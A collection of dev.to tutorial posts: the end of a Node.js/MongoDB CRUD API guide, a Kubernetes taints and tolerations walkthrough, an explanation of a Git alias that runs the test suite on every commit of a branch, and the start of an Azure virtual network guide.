
    const updatedProduct = await Product.findById(id);
    res.status(200).json(updatedProduct);
  } catch (error) {
    res.status(500).json({ message: error.message });
  }
};

const deleteProduct = async (req, res) => {
  try {
    const { id } = req.params;
    const product = await Product.findByIdAndDelete(id);

    if (!product) {
      return res.status(404).json({ message: "Product not found" });
    }

    res.status(200).json({ message: "Product deleted successfully" });
  } catch (error) {
    res.status(500).json({ message: error.message });
  }
};

module.exports = {
  getProducts,
  getProduct,
  createProduct,
  updateProduct,
  deleteProduct,
};
```

In this code, we define CRUD operations for our Product model. It includes:

- getProducts: Fetches all products.
- getProduct: Fetches a product by its ID.
- createProduct: Creates a new product with provided data.
- updateProduct: Updates a product by its ID.
- deleteProduct: Deletes a product by its ID.

Each function handles possible errors and returns appropriate HTTP responses.

## Define routes

Create a routes folder in the root directory and in it create `product.route.js`. Insert the code below.

```
const express = require("express");
const Product = require("../models/product.model.js");
const router = express.Router();
const {getProducts, getProduct, createProduct, updateProduct, deleteProduct} = require('../controllers/product.controller.js');

router.get('/', getProducts);
router.get("/:id", getProduct);
router.post("/", createProduct);

// update a product
router.put("/:id", updateProduct);

// delete a product
router.delete("/:id", deleteProduct);

module.exports = router;
```

In this code, we set up Express routes for CRUD operations on our Product model. It imports the necessary modules, creates an Express router, and defines routes for:

- Fetching all products (`GET /`)
- Fetching a single product by ID (`GET /:id`)
- Creating a new product (`POST /`)
- Updating a product by ID (`PUT /:id`)
- Deleting a product by ID (`DELETE /:id`)

Finally, it exports the router for use in the main application. For these routes to be reachable at `/api/products` (the URL used in the next section), `index.js` must also parse JSON request bodies and mount the router: add `app.use(express.json())` and `app.use('/api/products', require('./routes/product.route.js'))` near the top of that file.

## Testing your API

Now that we've created our CRUD operations, let's test them. We are going to use [Insomnia](https://app.insomnia.rest/app/dashboard/organizations); if you don't have it, you can download it and create an account. Follow the steps outlined below to test the create operation (POST request).

- Open Insomnia: Launch the Insomnia application.
- Create a New Request: Click on the "+" button to create a new request.
- Set Request Type: Select "POST" from the dropdown menu next to the request name.
- Enter URL: Input the URL of your API endpoint (http://localhost:3000/api/products)
- Enter Request Body: Click on the "Body" tab, select "JSON," and enter the JSON data you want to send.
- Send Request: Click the "Send" button to send the request to the server.
- View Response: Inspect the response from the server in the lower pane of Insomnia.

The API call for creating a product in MongoDB was successful, as indicated by the 200 OK status in the image below, which illustrates how it should operate.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/969ppxgws45d6dypvpz6.PNG)

You should therefore be able to view the created item when you navigate to the database and select Browse Collections.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cqqrn3xo64rgfnpfkm27.PNG)

## Test Read operations

The technique for testing a GET request is almost the same as what we discussed above; you make a new request and select GET from the dropdown menu.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/arf1pnvdl0njv47gklst.PNG)

Proceed to try the final two operations, update and delete (PUT, DELETE), from the dropdown menu.

## Conclusion

With this beginner's tutorial, you should now have a solid foundation for performing CRUD operations using NodeJS and MongoDB.

For more tech insights, follow me on [X](https://x.com/musembiwebdev) and connect on [LinkedIn](https://www.linkedin.com/in/daniel-musembi-a05852283/).
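As an optional extra: if you'd rather exercise the API from code than from Insomnia, a short Python script using the `requests` library can hit all four endpoints. This is a quick sketch, assuming the server from this tutorial is running on `localhost:3000` with the router mounted at `/api/products`; the sample field values are just illustrations:

```python
import requests

BASE = "http://localhost:3000/api/products"

# Create a product (fields match the Product schema defined above).
created = requests.post(
    BASE, json={"name": "Laptop", "quantity": 3, "price": 999}
).json()
product_id = created["_id"]  # Mongoose documents expose their id as _id

# Read: all products, then the one we just created.
print(requests.get(BASE).json())
print(requests.get(f"{BASE}/{product_id}").json())

# Update the price.
print(requests.put(f"{BASE}/{product_id}", json={"price": 899}).json())

# Delete it again.
print(requests.delete(f"{BASE}/{product_id}").json())
```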
danmusembi
1,917,618
40 Days Of Kubernetes (14/40)
Day 14/40 Taints and Tolerations in Kubernetes Video Link @piyushsachdeva Git...
0
2024-07-15T17:31:43
https://dev.to/sina14/40-days-of-kubernetes-1440-m3a
kubernetes, 40daysofkubernetes
## Day 14/40

# Taints and Tolerations in Kubernetes

[Video Link](https://www.youtube.com/watch?v=nwoS2tK2s6Q)
@piyushsachdeva
[Git Repository](https://github.com/piyushsachdeva/CKA-2024/)
[My Git Repo](https://github.com/sina14/40daysofkubernetes)

We're going to look at `taint` and `toleration`. When a `node` carries a `taint`, it only accepts a `workload` that tolerates that specific `taint` and doesn't allow other workloads to be scheduled on itself. So we taint a `node` and tell a `pod` to tolerate that `taint` in order for it to be scheduled on that `node`.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0ck9ietgj62m4ffr6dkf.png)
(Photo from the video)

"Tolerations are applied to pods. Tolerations allow the scheduler to schedule pods with matching taints. Tolerations allow scheduling but don't guarantee scheduling: the scheduler also evaluates other parameters as part of its function. Taints and tolerations work together to ensure that pods are not scheduled onto inappropriate nodes. One or more taints are applied to a node; this marks that the node should not accept any pods that do not tolerate the taints."

**Note** There are two special cases:

- An empty `key` with operator `Exists` matches all keys, values and effects, which means this will tolerate everything.
- An empty `effect` matches all effects with key `key1`.

The allowed values for the `effect` field are:

- NoExecute > applies to new and already-running pods (running pods that don't tolerate the taint are evicted)
- NoSchedule > applies to new pods only
- PreferNoSchedule > a soft version of NoSchedule; not guaranteed

[source](https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/)

A toleration is essentially the counter to a taint, allowing a pod to ignore taints applied to a node. A toleration is defined in the pod specification and must match the key, value, and effect of the taint it intends to tolerate.

**Toleration Operators**: While matching taints, tolerations can use operators like Equal and Exists. The Equal operator requires an exact match of key, value, and effect, whereas the Exists operator matches a taint based on the key alone, disregarding the value. For instance:

```
tolerations:
- key: "key"
  operator: "Equal"
  value: "value"
  effect: "NoSchedule"
```

[source](https://overcast.blog/mastering-kubernetes-taints-and-tolerations-08756d5faf55)

---
#### 1. Taint the node

```console
root@localhost:~# kubectl get nodes
NAME                       STATUS   ROLES           AGE   VERSION
lucky-luke-control-plane   Ready    control-plane   8d    v1.30.0
lucky-luke-worker          Ready    <none>          8d    v1.30.0
lucky-luke-worker2         Ready    <none>          8d    v1.30.0

root@localhost:~# kubectl taint node lucky-luke-worker gpu=true:NoSchedule
node/lucky-luke-worker tainted
root@localhost:~# kubectl taint node lucky-luke-worker2 gpu=true:NoSchedule
node/lucky-luke-worker2 tainted

root@localhost:~# kubectl describe node lucky-luke-worker | grep -i taints
Taints:             gpu=true:NoSchedule
```

- Let's schedule a `pod`

```console
root@localhost:~# kubectl run nginx --image=nginx
pod/nginx created
root@localhost:~# kubectl get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   0/1     Pending   0          6s
```

It says it's in `Pending` status, so let's see the error message of the pod:

```console
root@localhost:~# kubectl describe pod nginx
Name:             nginx
Namespace:        default
Priority:         0
Service Account:  default
Node:             <none>
Labels:           run=nginx
Annotations:      <none>
Status:           Pending
IP:
IPs:              <none>
Containers:
  nginx:
    Image:        nginx
    Port:         <none>
    Host Port:    <none>
    Environment:  <none>
    Mounts:
      /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-4xh8p (ro)
Conditions:
  Type           Status
  PodScheduled   False
Volumes:
  kube-api-access-4xh8p:
    Type:                    Projected (a volume that contains injected data from multiple sources)
    TokenExpirationSeconds:  3607
    ConfigMapName:           kube-root-ca.crt
    ConfigMapOptional:       <nil>
    DownwardAPI:             true
QoS Class:                   BestEffort
Node-Selectors:              <none>
Tolerations:                 node.kubernetes.io/not-ready:NoExecute op=Exists for 300s
                             node.kubernetes.io/unreachable:NoExecute op=Exists for 300s
Events:
  Type     Reason            Age   From               Message
  ----     ------            ----  ----               -------
  Warning  FailedScheduling  89s   default-scheduler  0/3 nodes are available: 1 node(s) had untolerated taint {node-role.kubernetes.io/control-plane: }, 2 node(s) had untolerated taint {gpu: true}. preemption: 0/3 nodes are available: 3 Preemption is not helpful for scheduling.
```

And the message is clear to us :)

```
0/3 nodes are available.
1 node(s) had untolerated taint {node-role.kubernetes.io/control-plane: }
2 node(s) had untolerated taint {gpu: true}
0/3 nodes are available: 3 Preemption is not helpful for scheduling.
```

- We need to create a toleration on a `pod` for it to be scheduled

```console
root@localhost:~# kubectl run redis --image=redis --dry-run=client -o yaml > redis_day14.yaml
root@localhost:~# vim redis_day14.yaml
```

Adding `tolerations` to the `yaml` file:

```yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: null
  labels:
    run: redis
  name: redis
spec:
  containers:
  - image: redis
    name: redis
    resources: {}
  dnsPolicy: ClusterFirst
  restartPolicy: Always
  tolerations:
  - key: "gpu"
    operator: "Equal"
    value: "true"
    effect: "NoSchedule"
status: {}
```

Apply the file:

```console
root@localhost:~# kubectl apply -f redis_day14.yaml
pod/redis created
root@localhost:~# kubectl get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   0/1     Pending   0          10m
redis   1/1     Running   0          5s
root@localhost:~# kubectl get pods -o wide
NAME    READY   STATUS    RESTARTS   AGE   IP            NODE                 NOMINATED NODE   READINESS GATES
nginx   0/1     Pending   0          10m   <none>        <none>               <none>           <none>
redis   1/1     Running   0          17s   10.244.2.12   lucky-luke-worker2   <none>           <none>
```

Let's delete the taint of one node and see what will happen to our pending `pod`:

```console
root@localhost:~# kubectl taint node lucky-luke-worker gpu=true:NoSchedule-
node/lucky-luke-worker untainted
root@localhost:~# kubectl get pods -o wide
NAME    READY   STATUS    RESTARTS   AGE   IP            NODE                 NOMINATED NODE   READINESS GATES
nginx   1/1     Running   0          22m   10.244.1.14   lucky-luke-worker    <none>           <none>
redis   1/1     Running   0          11m   10.244.2.12   lucky-luke-worker2   <none>           <none>
```

- By default, the `control-plane` node has the `NoSchedule` taint

```console
root@localhost:~# kubectl get nodes
NAME                       STATUS   ROLES           AGE   VERSION
lucky-luke-control-plane   Ready    control-plane   8d    v1.30.0
lucky-luke-worker          Ready    <none>          8d    v1.30.0
lucky-luke-worker2         Ready    <none>          8d    v1.30.0
root@localhost:~# kubectl describe node lucky-luke-control-plane | grep Taint
Taints:             node-role.kubernetes.io/control-plane:NoSchedule
```

---

#### Selector

Instead of the `node` deciding which type of `pod` to accept, a `nodeSelector` gives the decision to the `pod` about which `node` it can be deployed on.

- Let's try:

```console
root@localhost:~# kubectl run nginx2 --image=nginx --dry-run=client -o yaml > nginx2-day14.yaml
root@localhost:~# vim nginx2-day14.yaml
```

```yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: null
  labels:
    run: nginx2
  name: nginx2
spec:
  containers:
  - image: nginx
    name: nginx2
    resources: {}
  dnsPolicy: ClusterFirst
  restartPolicy: Always
  nodeSelector:
    gpu: "false"
status: {}
```

```console
root@localhost:~# kubectl apply -f nginx2-day14.yaml
pod/nginx2 created
root@localhost:~# kubectl get pods -o wide
NAME     READY   STATUS    RESTARTS   AGE   IP            NODE                 NOMINATED NODE   READINESS GATES
nginx    1/1     Running   0          46m   10.244.1.14   lucky-luke-worker    <none>           <none>
nginx2   0/1     Pending   0          8s    <none>        <none>               <none>           <none>
redis    1/1     Running   0          35m   10.244.2.12   lucky-luke-worker2   <none>           <none>
```

- Label one node and let's see what will happen:

```console
root@localhost:~# kubectl label node lucky-luke-worker gpu="false"
node/lucky-luke-worker labeled
root@localhost:~# kubectl get pods -o wide
NAME     READY   STATUS    RESTARTS   AGE     IP            NODE                 NOMINATED NODE   READINESS GATES
nginx    1/1     Running   0          49m     10.244.1.14   lucky-luke-worker    <none>           <none>
nginx2   1/1     Running   0          3m21s   10.244.1.15   lucky-luke-worker    <none>           <none>
redis    1/1     Running   0          38m     10.244.2.12   lucky-luke-worker2   <none>           <none>
```
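As a side note, the same `gpu=true:NoSchedule` taint we applied with `kubectl taint` can also be set programmatically. A minimal sketch using the official `kubernetes` Python client, reusing the node name from the cluster above:

```python
from kubernetes import client, config

# Use the same credentials/context kubectl uses (~/.kube/config).
config.load_kube_config()
v1 = client.CoreV1Api()

# Patch the node spec with the gpu=true:NoSchedule taint. Note that this
# patch replaces the whole taints list, so include any taints you want to keep.
body = {
    "spec": {
        "taints": [
            {"key": "gpu", "value": "true", "effect": "NoSchedule"},
        ]
    }
}
v1.patch_node("lucky-luke-worker", body)
```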
sina14
1,917,900
Test that forking code!
Originally published on peateasea.de. Not only should the final commit in a pull request patch...
0
2024-07-13T14:45:34
https://peateasea.de/test-that-forking-code/
git, bash, python
---
title: Test that forking code!
published: true
date: 2024-07-08 22:00:00 UTC
tags: Git,Bash,Python
canonical_url: https://peateasea.de/test-that-forking-code/
cover_image: https://peateasea.de/assets/images/git-fork-all-tested.png
---

*Originally published on [peateasea.de](https://peateasea.de/test-that-forking-code/).*

Not only should the final commit in a pull request patch series pass all its tests but also each commit back to where the pull request branched from `main`. A Git alias helps to automate this process. Introducing: `git test-fork`.

I take pride in delivering quality code in my pull requests, be it for clients,<sup id="fnref:hire-me" role="doc-noteref"><a href="#fn:hire-me" rel="footnote">1</a></sup> or for open source software submissions. One aspect of that quality is to deliver small chunks of working functionality in each commit. To ensure that a pull request has this property, I like to ensure that each commit builds correctly, that the test suite passes and, depending on the project, that the linter checks also all pass. Of course, for a multi-commit pull request checking each commit manually is a lot of work. To avoid unnecessary work, I've automated this process with a Git alias: `git test-fork`. Here's why I use it and how its inner workings, erm, work.

## My main focus: quality

Have you ever been doing [software archaeology](https://en.wikipedia.org/wiki/Software_archaeology) on a codebase and wondered why the test suite on an old commit suddenly no longer works? And have you then spent the next several hours trying to work out what the test failures have to do with the bug only to find out that they're not related? If so, you know how annoying if not downright painful such a situation is. Also, you'll know how stressful this can be because you're usually under pressure when bug-hunting and wild goose chases are the last thing you need.

Wouldn't it have been nice if those who came before you<sup id="fnref:they-could-be-you" role="doc-noteref"><a href="#fn:they-could-be-you" rel="footnote">2</a></sup> had ensured that the test suite passed at every commit? This would have saved you time, stress and grey hairs. Also, this would have reduced friction in your bug-hunting, letting you find (and hopefully solve!) the bug earlier. Instead, you went on a minor odyssey, delving into problems unrelated to those you were actually trying to solve.

I've had that kind of experience one too many times in the past. My solution: make sure that each and every commit in a pull request passes its test suite and, if relevant, passes the project's linter tests.

Before I [show the command and explain how its internals work](#automatically-testing-forks-via-git), why do I think going to this effort is worth it?

To me, a passing test suite is a sign of quality and that whoever wrote the code cared enough to submit robust, well-tested code. It's sort of like a craftsperson taking the time to build in quality and taking pride in their work and a job well done. Software isn't a work of art in the way that [Biedermeier furniture](https://en.wikipedia.org/wiki/Biedermeier#Furniture_design_and_interior_decorating) or a [Stradivarius violin](https://en.wikipedia.org/wiki/Stradivarius) is, however a strong focus on quality and [craftsmanship](https://en.wikipedia.org/wiki/Software_craftsmanship) (for want of a better word) makes for better software.
A codebase in which each commit passes its tests has technical benefits: it's possible to use [`git bisect`](https://git-scm.com/docs/git-bisect) automatically and any commit could be pushed to production at any time, affording a high level of development flexibility and responsiveness. Personally, I like the feeling of a solid foundation; it's something I know I can depend upon and build upon.

## Swings and roundabouts

Of course, running the full test suite on each commit has its downsides. It slows you down and some might feel that it adds unnecessary friction to the development workflow, especially when the test suite is slow. Others might feel that it's just another exercise in gold plating or some kind of over-the-top obsessive programmer behaviour. These are valid points and there needs to be a balance between a desire for high quality and getting code "out the door". After all, one can go too far and being extremist about things is usually a bad sign.

That being said, sometimes it's a good idea to slow down when developing software so that our brains can mull over what we're doing and contemplate the bigger picture. There have been times when I've been running the tests on each commit for a given branch and have realised that a commit wasn't necessary, or the idea behind a direction of development was plain wrong. This extra cogitation time allowed me to rethink what I was doing and ultimately led to better software. Also, by _not_ submitting some code, I saved my colleagues' time, because it was code they _didn't_ have to review!

Sometimes, ensuring that each commit passes the test suite along a feature branch picks up on things I'd missed during development and should have fixed. Recently, I was refactoring some code and had finished a long-ish feature branch. I ran the tests together with the linter checks and the linter spotted a bug: while renaming a module I'd not updated the imports in a file. This was the code "talking" to me. It showed that I'd missed a particular code change _and_ that there was a hole in my test coverage. This was a big win because it gave me the opportunity to improve the tests which will reduce risk and friction when refactoring in the future.

Also, if you notice that it takes _ages_ to test each commit on a feature branch, then this is not a hint that you shouldn't be testing each commit, but a sign that the test suite is too slow. That's something that you could invest time in in the future. It's like an application of ["if it hurts, do it more often"](https://martinfowler.com/bliki/FrequencyReducesDifficulty.html).

Another criticism of this technique is that it takes a long time on branches with many commits. This is a good thing: it provides feedback to you to keep your pull requests and feature branches small and focused. Again, "if it hurts, do it more often"!

## Automatically testing forks via Git

Obviously, testing all commits on a fork of the `main` branch isn't something one wants to do manually. A single commit? Fine. Ten commits on a feature branch? Nah, I'll pass, thanks. :smiley:

So how do you know when the current branch forked from the `main` branch? And how do you make Git run tests on each commit? Let's get to that now.
Here's the alias I have set up in my `.gitconfig`:

```shell
test-fork = !"f() { \
    [ x$# = x1 ] && testcmd=\"$1\" || testcmd='make test'; \
    upstream_base_branch=$(git branch --remotes | grep 'origin/\\(HEAD\\|master\\|main\\)' | cut -d'>' -f2 | head -n 1); \
    current_branch=$(git rev-parse --abbrev-ref HEAD); \
    fork_point=$(git merge-base --fork-point $upstream_base_branch $current_branch); \
    git rebase $fork_point -x \"git log -1 --oneline; $testcmd\"; \
    }; f"
```

There's a lot going on in here, so I tried representing it as a diagram:

![](https://peateasea.de/assets/images/git-test-fork-command-details.png)

which–along with the detailed explanations below–I hope aids understanding of the alias code above.

### A big shell function

Let's focus on the full `test-fork` alias. In essence, this command uses `git rebase` to execute a command (via the `-x` option) on each commit from a given base commit.

This is a very long command, and as far as Git is concerned, this command is all one line. However, to make it easier to edit within the `.gitconfig` file, I've split it across several lines by using trailing backslashes (`\`).

On the left-hand side of the equals sign is the name of the alias: `test-fork`. On the right-hand side is where all the action is happening: a shell function that Git runs when the user enters the command

```shell
$ git test-fork
```

within a Git repository.

We define the shell function within a large double-quoted string, and hence we have to be careful when embedding double quotes. The exclamation mark at the beginning means that [Git treats the alias as a shell command](https://git-scm.com/docs/git-config/) and hence it won't prefix the alias by the `git` command as would be the case without the exclamation mark.

The shell function has this form:

```shell
f() { ... code ... }; f
```

meaning that we define the function and then immediately run it. The semicolon separates the function definition from its call; by entering `f` at the end we call the function that we just defined.

### Defining the test command to run

The first line of the function is

```shell
[ x$# = x1 ] && testcmd=\"$1\" || testcmd='make test'
```

This code tests to see if we have an argument and if so, sets the variable `testcmd` to its value (i.e. the variable `$1`). Otherwise, we set `testcmd` to the default value of `make test`. In other words, if you run

```shell
$ git test-fork 'some-test-command'
```

then `some-test-command` will test each commit in your branch. If you don't specify a command explicitly, then the alias falls back to using `make test`.

The variable `$#` is a [special parameter in Bash](https://www.gnu.org/software/bash/manual/bash.html#Special-Parameters) and expands to the number of positional parameters. In other words, if there is a single argument, `$#` will be the value `1` and the test

```shell
[ x$# = x1 ]
```

will evaluate as true. The code will then take the first branch of this implicit `if` block (i.e. the bit after `&&`) setting `testcmd` to the value passed in on the command line and using this as the test command for the rest of the code in the shell function.

### The origin of branches

The next line in the function is

```shell
upstream_base_branch=$(git branch --remotes | grep 'origin/\\(HEAD\\|master\\|main\\)' | cut -d'>' -f2 | head -n 1)
```

which determines the name of the upstream (a.k.a. `origin`) branch from which the local feature branch is based. This information will later help us work out where the feature branch forked off from the main line of development.
This is the first Git-related command, which I've indicated by the number ① and the colour blue in the diagram above. This line runs the command within the `$()` and returns its result as the value of the variable. The `$()` is a Bash feature called [command substitution](https://www.gnu.org/software/bash/manual/html_node/Command-Substitution.html) and

> allows the output of a command to replace the command itself.

The command

```shell
$ git branch --remotes
```

returns a list of all locally-known remote branches. The one we're interested in is either `origin/master` or `origin/main`, or what `origin/HEAD` is currently pointing to.

The output from `git branch --remotes` can be different in certain situations. Usually, you will see output like the following:

```shell
$ git branch --remotes
  origin/HEAD -> origin/master
  origin/master
  origin/rename-blah-to-fasl
  origin/refactor-foo-baa
```

where we have a reference `origin/HEAD` which points to the actual upstream main branch, which in this case is `origin/master`.

In other situations (and I haven't been able to work out exactly why; I think this has to do with sharing an upstream repository with others, but I'm not sure), the output omits a pointer from `origin/HEAD` to the main remote branch, giving e.g.

```shell
$ git branch --remotes
  origin/main
```

where I've used the now more common `main` name for the main branch in the upstream repository.

The filtering commands after `git branch --remotes` handle both situations. By filtering on `HEAD`, `master` or `main` with the `grep` command, we ensure that all variations are in the filtered output. The `cut` extracts the reference that `origin/HEAD` is pointing to (if `origin/HEAD` exists in the output) and the `head` ensures we only select the first entry should there be multiple matches. If `origin/HEAD` doesn't exist in the output, the `cut` passes its output to `head` and we again select the first entry in the list of appropriate upstream branch names.

When constructing `grep` regular expressions in the shell, we have to escape Boolean-or expressions (the pipe character `|`) and groups (parentheses, `()`) with a backslash (`\`). In the case we have here, we have to "escape the escape character" within the Git alias by using two backslashes (`\\`). Thus, when Git passes the command to the shell, there is only a single backslash character present and the regular expression is formed correctly.

After all this hard work, the variable `upstream_base_branch` contains the name of the upstream base branch.

### Where are we now?

The third line in our shell function

```shell
current_branch=$(git rev-parse --abbrev-ref HEAD)
```

finds out the name of the current branch. I.e. this is the name of the feature branch that we want to test. I've highlighted this information by the number ② and the colour green in the diagram above. We use this information, along with the upstream branch's name, to work out where the current branch forked from the main line of development. This is the purpose of the next line.

### Where did we fork'n come from?

Now we're in a position to work out where the feature branch forked<sup id="fnref:could-say-branched" role="doc-noteref"><a href="#fn:could-say-branched" rel="footnote">3</a></sup> from the main line of development. In particular, we want to find the commit id of this fork point.
Hence the next line of code assigns a variable called `fork_point`:

```shell
fork_point=$(git merge-base --fork-point $upstream_base_branch $current_branch)
```

The [`git merge-base` command](https://git-scm.com/docs/git-merge-base)

> finds the best common ancestor(s) between two commits to use in a three-way merge.

When using the `--fork-point` option, the command takes the form

```
git merge-base --fork-point <ref> [<commit>]
```

The `--fork-point` option is key for us here because it finds

> the point at which a branch (or any history that leads to `<commit>`) forked from another branch (or any reference) `<ref>`.

In our case, we use `git merge-base` to find the commit at which the `current_branch` diverged from `upstream_base_branch`. I've denoted this with the number ③ and the colour red in the diagram above.

It was a fair bit of work to get to this point, but now we're in a position to use `git rebase` to run our tests.

### Skip to the commit, my darling

Now we get to the very heart of the matter: iterating over each commit in the branch and running the test command on each commit as we go. I've referenced this process by the orange number ④ and arrows in the diagram above. We run the test command via the [`-x/--exec` argument to `git rebase`](https://git-scm.com/docs/git-rebase#Documentation/git-rebase.txt--xltcmdgt):

```shell
git rebase $fork_point -x \"git log -1 --oneline; $testcmd\"
```

Here, we rebase the branch we are currently on (i.e. the feature branch) onto where it forked from the upstream base branch.

Note that `git rebase` operates on a reference which exists upstream and [aborts the rebase if there is no upstream configured](https://git-scm.com/docs/git-rebase#_description). This is why we use the upstream base branch when [working out the fork point](#where-did-we-forkn-come-from). Also, the upstream branch is usually the branch used for comparisons to the feature branch when submitting a pull request on systems such as GitHub, GitLab, Gitea, etc. Thus it makes sense to consider the state of the upstream's `main` branch rather than the local `main` branch's current state.

The `-x` option takes a string argument of the shell command to run. In our case here, we need to escape the double quotes so that they don't conflict with the quotes enclosing the entire alias code. Doing so ensures that quotes still enclose the command to run for each commit in the rebase process. Note that we need double quotes here as well so that the value of `$testcmd` is interpolated into the command ultimately executed by `git rebase`.

To provide context for the test command, and to indicate where the `git rebase` process currently is, we precede it with

```
git log -1 --oneline
```

This [prints the abbreviated commit id and subject line](https://git-scm.com/docs/git-log#Documentation/git-log.txt---oneline) on a single line for the current commit, which can be useful to know if the test command fails.

Finally, we run the test command defined in the variable `$testcmd`. This is either the command specified as an argument to `git test-fork` or is `make test` if no arguments were given.

## That's it!

That's the guts of the `test-fork` alias in detail. Clear as mud? Ok, let's see the command in action and hopefully its use and utility will make more sense.

## `git test-fork` in action

Sometimes it's easier to understand what's going on if one sees something run. I can't do that dynamically here, but I can show a representative example.
### A quick but detailed example

Here's an example from a Python project where I was wanting to reduce [technical debt](https://en.wikipedia.org/wiki/Technical_debt) with the aid of the [`pylint` code checker](https://www.pylint.org/). I'd used `pylint` to sniff out any code smells which might need addressing and had a few commits on a feature branch which had fixed these issues. I now wanted to make sure that I'd not broken anything in the process, hence I wanted to run the test suite on each commit in the feature branch.

Since I have a `Makefile` which wraps the actual test command behind a simple `test` target, I only needed to run `git test-fork`. This is the output:

```shell
$ git test-fork
Executing: git log -1 --oneline; make test
8e6ff5b (HEAD) Fix import ordering
make --directory=src test
make[1]: Entering directory '/home/cochrane/a-python-project/src'
. ../venv/bin/activate; pytest
============================= test session starts =============================
<snip-lots-of-test-output>
======================= 257 passed in 239.65s (0:03:59) =======================
make[1]: Leaving directory '/home/cochrane/a-python-project/src'
Executing: git log -1 --oneline; make test
2c5c1d9 (HEAD) Remove unnecessary "dunder" calls
make --directory=src test
make[1]: Entering directory '/home/cochrane/a-python-project/src'
. ../venv/bin/activate; pytest
============================= test session starts =============================
<snip-lots-of-test-output>
======================= 257 passed in 248.33s (0:04:08) =======================
make[1]: Leaving directory '/home/cochrane/a-python-project/src'
Executing: git log -1 --oneline; make test
bccc026 (HEAD) Remove reimported module
make --directory=src test
make[1]: Entering directory '/home/cochrane/a-python-project/src'
. ../venv/bin/activate; pytest
============================= test session starts =============================
<snip-lots-of-test-output>
======================= 257 passed in 254.63s (0:04:14) =======================
make[1]: Leaving directory '/home/cochrane/a-python-project/src'
Successfully rebased and updated refs/heads/address-technical-debt.
```

There are a few things to note about the output:

- `git rebase` echoes the command it's running: `Executing: git log -1 --oneline; make test`. This lets us check that Git is running the command we want it to run.
- We see the `git log -1 --oneline` output fairly clearly. Bash displays this with nice, bright colours and is easy to see in the terminal. Unfortunately, I couldn't reproduce that here though. Sorry. :confused:
- `make` changes into the `src/` directory to then run the `test` target within that directory: `make --directory=src test` and `make[1]: Entering directory '/home/cochrane/a-python-project/src'`.
- Now we see the `pytest` invocation that `make test` runs.
- There is _lots_ of output from `pytest`. I've removed a lot so we can focus on the main points in this discussion.
- We see that the tests passed, yay! :tada:
- `make` returns to the original directory after the commands in the `test` target have completed successfully: `make[1]: Leaving directory '/home/cochrane/a-python-project/src'`.
- Git checks out the next commit on the feature branch and the process repeats.

### Rebase starts from the base

Note that the rebase command starts running from the project's base directory. This is independent of where you run the `git test-fork` command.
So, if you want to run `pytest` on an individual file, you'll need to explicitly change into the appropriate directory as part of the test command. In other words, if you have to be in the `src/` directory to run a single test like this:

```shell
$ pytest tests/test_views.py
```

then using

```shell
$ git test-fork 'pytest tests/test_views.py'
```

won't work, because `git rebase` operates from the base directory and `pytest` won't be able to find the files. Also, using the full path to the test file by running

```shell
$ git test-fork 'pytest src/tests/test_views.py'
```

probably won't work. At least, it doesn't work in my case because I have a `pytest.ini` file which `pytest` reads and it's in the `src/` dir. Thus, the only command that will allow you to run individual test files in such a situation is:

```shell
$ git test-fork 'cd src && pytest tests/test_file.py'
```

where each command execution by `git rebase` also changes into the required directory to run the individual test file. Running this command has output much like the detailed output included above.

### Common usage variations

Other common invocations I use are:

```shell
$ git test-fork 'make lint'
```

which runs the linter checks on the entire codebase for each commit in the branch. Also, I tend to use this one a lot:

```shell
$ git test-fork 'make test && make lint'
```

which runs the full test suite and the linter checks for each commit in the feature branch. Note that we can chain commands in the argument passed to `git test-fork` by using the Bash Boolean-and operator: `&&`.

### What to do if things go wrong

Nobody's perfect and something could go wrong in the middle of the rebase process. Actually, this is exactly what we're trying to do: we _want_ to sniff out any problems before they make their way upstream into a pull request. This way we save our colleagues from having to stumble across problems when reviewing the code.

So what happens if the test suite fails in the middle of a rebase? Git interrupts the rebase. That's all. Actually, it's great: you're dropped right into the middle of where the problem is, which is the best place to be able to fix it.

After fixing the issue, run `make test` (or the equivalent command) to check that everything now works. Add the changes with

```shell
$ git add -p
```

or use `git add` on each of the files. Then it's simply a matter of amending the commit

```shell
$ git commit --amend
```

before then continuing the rebase with:

```shell
$ git rebase --continue
```

Or, if things look to be too complicated and you might need some thinking time, just abort:

```shell
$ git rebase --abort
```

Then, take a step back, take a deep breath, and dig in again.

## Wrapping up

The `test-fork` alias can be really helpful in finding test or linting issues locally before pushing code to colleagues or collaborators. I'm fairly sure this code could be improved upon. Still, it works well for my purposes and is a standard part of my process to provide high-quality work to internal teams and external customers.

So what are you waiting for? Go test that forking code!

1. I'm available for freelance Python/Perl backend development and maintenance work. Contact me at [paul@peateasea.de](mailto:paul@peateasea.de) and let's discuss how I can help solve your business' hairiest problems. [↩](#fnref:hire-me)
2. Of course, "they" could have been an earlier you! [↩](#fnref:they-could-be-you)
3. I could have said "branched" here, but the phrase "a branch branched" sounded a bit odd. [↩](#fnref:could-say-branched)
peateasea
1,917,982
Creating a Virtual Network with Two Virtual Machines that can ping each other.
How to create a virtual network that consists of two virtual machines that can communicate with each other.
0
2024-07-12T21:46:36
https://dev.to/tundeiness/creating-a-virtual-network-with-two-virtual-machines-that-can-ping-each-other-3056
azure, virtualnetwork, virtualmachines, subnet
---
title: Creating a Virtual Network with Two Virtual Machines that can ping each other.
published: true
description: How to create a virtual network that consists of two virtual machines that can communicate with each other.
tags: Azure, VirtualNetwork, VirtualMachines, Subnet
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6zdqhzl861ueljv7k6lt.jpg
# Use a ratio of 100:42 for best results.
# published_at: 2024-07-10 02:37 +0000
---

# INTRODUCTION

Today I will be writing about how to create a Virtual Network with two Virtual Machines that can ping each other. This process involves setting up a virtual environment where multiple virtual machines (VMs) can communicate seamlessly, mimicking a real-world network setup. In this article, I will walk through the steps necessary to create a virtual network and configure two virtual machines to ensure they can successfully ping each other, demonstrating effective connectivity and interaction within the virtualized environment.

## STEP 1: CREATE A VIRTUAL NETWORK & A SUBNET

- From the Azure Portal home page, at the top left corner of the page, click the hamburger (menu) button.

